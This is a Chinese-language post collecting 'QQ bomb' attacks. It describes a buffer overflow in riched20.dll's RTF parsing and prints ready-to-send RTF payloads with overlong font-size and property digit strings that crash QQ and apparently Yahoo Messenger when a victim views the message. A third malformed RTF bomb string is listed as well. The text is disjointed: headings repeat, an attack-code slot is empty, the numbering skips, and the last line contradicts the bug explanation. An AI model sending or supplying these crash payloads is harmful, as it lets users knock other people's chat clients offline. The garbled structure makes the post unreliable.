简介

漏洞描述

简介

QQ炸弹综述

近些日来 发现有更多的人问我QQ炸弹的事 在此 我搜集了所有的炸弹类型供大家研究

1．使用前提：对方使用的QQ必须是QQ2003III beta4版的，否则是无效的

攻击代码就在下面的括号中间，

()

漏洞描述

riched20.dll中存在一个缓冲区溢出漏洞，该漏洞可导致使用此DLL模块相应功能的应用程序崩溃，但其很难被用来执行任意代码。

问题出现在其对RTF文档分析的代码中，其对文档中属性标示中的数字（如字体大小）等处理不当，使其出现溢出。

此溢出似乎不能导致执行任意代码。

下面一段RTF文档可能导致非法操作：

{\\rtf1\\ansi\\ansicpg936\\deff0\\deflang1033\\deflangfe2052{\\fonttbl{\\f0\\fnil\\fprq2\\fcharset134 \\'cb\\'ce\\'cc\\'e5;}}

{\\colortbl ;\\red255\\green0\\blue255;}

\\viewkind4\\uc1\\pard\\cf1\\kerning2\\f0\\fs18121111111111111111111111111111111110000www.coyoc.com\\fs20\\par

}

其中 \\fs 是用来设置后面的文字 byebye 的字体大小的，当字体大小数字串长度超过32字节时，就会引发缓冲区溢出，当超过34字节以后就有可能会导致应用程序崩溃。

不但是\\fs的设置中会出现这个问题，其他属性标示中的类似情况下也会出现同样的问题，例如下面一段RTL文档，同样会导致非法操作：

{\\rtf1\\ansi\\ansicpg936\\deff0\\deflang1033\\deflangfe2052{\\fonttbl{\\f0\\fnil\\fprq2\\fcharset134 \\'cb\\'ce\\'cc\\'e5;}}

{\\colortbl ;\\red255\\green0\\blue255;}

\\viewkind4\\uc1\\pard\\cf1\\kerning2\\f0121111111111111111111111111111111112222\\fs180www.coyoc.com\\fs20\\par

}

更为可怕的是，目前很多软件包括国内最流行的既时通讯软件QQ(QQ2000c 0825 版本以后)都会受此漏洞影响，对方可以给你发送一个包含利用漏洞的

攻击消息，那你的QQ在查看对方的消息时会立即崩溃。

经测试，对YHAOOMESSAGE同样有效。

3．提交格式的错误

{\\urtfl\\ansi\\街头黑客\\QQ炸弹{\\fonttblvhq{\\f\\fnil\\自然因子\\WWW.COYOC.COM;}}

4．本炸弹并非使用程序BUG